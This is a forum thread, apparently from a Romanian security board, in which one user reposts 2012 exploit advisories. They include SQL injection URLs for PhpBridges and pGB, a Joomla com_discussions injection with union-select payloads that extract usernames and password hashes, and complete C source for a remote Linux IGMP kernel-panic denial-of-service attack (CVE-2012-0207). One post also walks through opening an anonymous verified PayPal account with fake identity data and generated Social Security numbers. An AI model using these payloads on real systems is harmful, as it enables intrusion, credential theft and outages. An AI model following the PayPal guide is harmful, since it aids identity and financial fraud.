    PhpBridges Blog System members.php SQL Injection # Exploit Title: PhpBridges Blog System SQL Injection Vulnerability # Date: 18/01/2012 - 04.19 # Author: 3spi0n # Software Website: https://launchpad.net/phpbridges # Tested On: BackTrack 5 - Win7 Ultimate # Platform: Php >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> [$] Vulnerable File: [~] members.php [$] Demo Sites: [~] server/members.php?id=2" [SQL Injection] >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> # Dar bi Koridor Benimki, Kendimi Aradigim. >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> # Contact: Twitter.Com/RigidusCO - Facebook.Com/3spi0ne >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> - Mr.PaPaRoSSe And 3spi0n - Bug Researcher Group - TURKEY >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Sursa: PhpBridges Blog System members.php SQL Injection
  21. The_Arhitect
    pGB 2.12 kommentar.php SQL Injection Vulnerability # Exploit Title: pGB 2.12 SQL Injection Vulnerability # Date: 18/01/2012 - 03.52 # Author: 3spi0n # Software Website: http://www.powie.de/ # Tested On: BackTrack 5 - Win7 Ultimate # Platform: Php >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> [$] Vulnerable File: [~] kommentar.php [$] Demo Sites: [~] http://server/kommentar.php?id=117' >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> # Dar bi Koridor Benimki, Kendimi Aradigim. >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> # Contact: Twitter.Com/RigidusCO - Facebook.Com/3spi0ne >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> - Mr.PaPaRoSSe And 3spi0n - Bug Researcher Group - TURKEY >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Sursa: pGB 2.12 kommentar.php SQL Injection Vulnerability
  22. The_Arhitect
    Create a verified PayPal. Anonymous. What you need: *Note For all new accounts DO NOT use your real information. * A Computer * Common Sense * Alias Information * Pre-Paid Green Dot card * A VPN (Not required, But recommended) Step one: Download a VPN client and ensure you are connected to it. Step Two: Create your Alias Information list... First Name: Middle Name: Last Name: *Make this Up Date of Birth: Race: Gender: *Make this up Social Security number: *Generate a Random Name - Fake Name Generator Phone number: Phone Pin: *Whitsle Phone, TextFree, Google Voice E-Mail Address: *Create This Address: City: State: Zip code: *Find with Google Maps Employer: Position: Salary: Employer Phone number: Employer Address: Employer City: Employer State: Employer Zip code: *Find using Google Maps Credit Card Number: CVC: Pin Number: Expiration date: *Greed Dot Information Bank Name: Account type: Account Number: Routing Number: *Create E-Trade Bank account Username: Password: *Make this up Security Question 1: Security Answer 1: Security Question 2: Security Answer 2: Security Question 3: Security Answer 3: *Make these up Step 3: Create an E-mail account, get a phone number, open an E-Trade Bank account, Register your Green Dot and create a paypal account. Step 4: Add your Green Dot Card to your paypal account. Add your E-Trade bank account to your Paypal account. Wait 2-3 days and confirm your account. Done. You now have an anonymous fully verified PayPal account. **I am NOT liable for anything you do. This is for informative purpose ONLY!!!!
  23. The_Arhitect
    http://www.myepisodes.com/mysig.php?/fb7df10302207504980187dc923828b3234f85/sig1s.png
  24. The_Arhitect
    Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36) /* ** linux-undeadattack.c ** Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36) ** CVE-2012-0207 ** credits to Ben Hutchings: ** http://womble.decadent.org.uk/blog/igmp-denial-of-service-in-linux-cve-2012-0207.html ** written By Kingcope ** Year 2012 ** Ripped & modified code written by Firestorm ** Tested against * OpenSuSE 11.4 system ** * Recent Ubuntu Distro ** ** Example: ** ./undeadattack 192.168.2.16 192.168.2.3 ** The Linux Kernel at the remote side will Panic ** when sent over the network :> ** ENJOY! */ #include <stdio.h> #include <string.h> #include <stdlib.h> #include <netinet/in.h> #include <netdb.h> #include <sys/time.h> #include <sys/types.h> #include <sys/socket.h> #include <arpa/inet.h> #include <unistd.h> struct iphdr { unsigned char ihl:4, version:4, tos; unsigned short tot_len, id, frag_off; unsigned char ttl, protocol; unsigned short check; unsigned int saddr, daddr; unsigned int options1; unsigned int options2; }; struct igmp_query { unsigned char type; unsigned char maxresponse; unsigned short csum; unsigned int mcast; char padding[40]; }; unsigned short in_chksum(unsigned short *, int); long resolve(char *); long resolve(char *host) { struct hostent *hst; long addr; hst = gethostbyname(host); if (hst == NULL) return(-1); memcpy(&addr, hst->h_addr, hst->h_length); return(addr); } int main(int argc, char *argv[]) { struct sockaddr_in dst; struct iphdr *ip; struct igmp_query *igmp; long daddr, saddr; int s, i=0, c, len, one=1; char buf[1500]; if (argc < 3) { printf("Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)\n" "credits to Ben Hutchings\nwritten by Kingcope\n" "Ripped & modified code written by Firestorm\n"); printf("Usage: %s <src> <dst>\n", *argv); return(1); } daddr = resolve(argv[2]); saddr = resolve(argv[1]); memset(buf, 0, 1500); ip = (struct iphdr *)&buf; igmp = (struct igmp_query*)&buf[sizeof(struct iphdr)]; dst.sin_addr.s_addr = daddr; dst.sin_family = AF_INET; ip->ihl = 7; ip->version = 4; ip->tos = 0; ip->tot_len = htons(sizeof(struct iphdr)+8); ip->id = htons(18277); ip->frag_off=0; ip->ttl = 1; ip->protocol = IPPROTO_IGMP; ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr)); ip->saddr = saddr; ip->daddr = daddr; ip->options1 = 0; ip->options2 = 0; igmp->type = 0x11; igmp->maxresponse = 0xff; igmp->mcast=inet_addr("224.0.0.1"); igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero. igmp->csum=in_chksum((unsigned short *)igmp, 8); s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (s == -1) return(1); printf("Sending IGMP packet: %s -> %s\n", argv[1], argv[2]); if (sendto(s,&buf,sizeof(struct iphdr)+8,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1) { perror("Error sending packet"); exit(-1); } close(s); s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (s == -1) return(1); ip->id = htons(18278); ip->tot_len = sizeof(struct iphdr)+12; igmp->type = 0x11; igmp->maxresponse = 0; igmp->mcast=inet_addr("0.0.0.0"); igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero. igmp->csum=in_chksum((unsigned short *)igmp, 12); printf("Sending IGMP packet: %s -> %s\n", argv[1], argv[2]); if (sendto(s,&buf,sizeof(struct iphdr)+12,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1) { perror("Error sending packet"); exit(-1); } return(0); } unsigned short in_chksum(unsigned short *addr, int len) { register int nleft = len; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *addr++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)addr; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } Sursa: Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)
  25. The_Arhitect
    Joomla Discussions Component (com_discussions) SQL Injection # # Title : Joomla Discussions Component (com_discussions) SQL Injection Vulnerability # Author : Red Security TEAM # Date : 17/01/2012 # Risk : High # Software : http://extensions.joomla.org/extensions/communication/forum/13560 # Tested On : CentOS # Contact : Info [ 4t ] RedSecurity [ d0t ] COM # Home : http://RedSecurity.COM # # Exploit : # http://server/index.php?option=com_discussions&view=thread&catid=[SQLi] # # Example : # # 1. [Get Database Name] # http://server/index.php?option=com_discussions&view=thread&catid=1' union all select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)--+a # 2. [Get Tables Name] # http://server/index.php?option=com_discussions&view=thread&catid=1' union all select (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from `information_schema`.tables where table_schema=0x6F7574706F7374715F6F65646576)--+a # 3. [Get Username] # http://server/index.php?option=com_discussions&view=thread&catid=1' union all select (select concat(0x7e,0x27,unhex(Hex(cast(jos_users.username as char))),0x27,0x7e) from `[Database Name]`.jos_users Order by username limit 0,1) --+a # 4. [Get Password] # http://server/index.php?option=com_discussions&view=thread&catid=1' union all select (select concat(0x7e,0x27,unhex(Hex(cast(jos_users.password as char))),0x27,0x7e) from `[Database Name]`.jos_users Order by username limit 0,1) --+a # Sursa: Joomla Discussions Component (com_discussions) SQL Injection
×
×
  • Create New...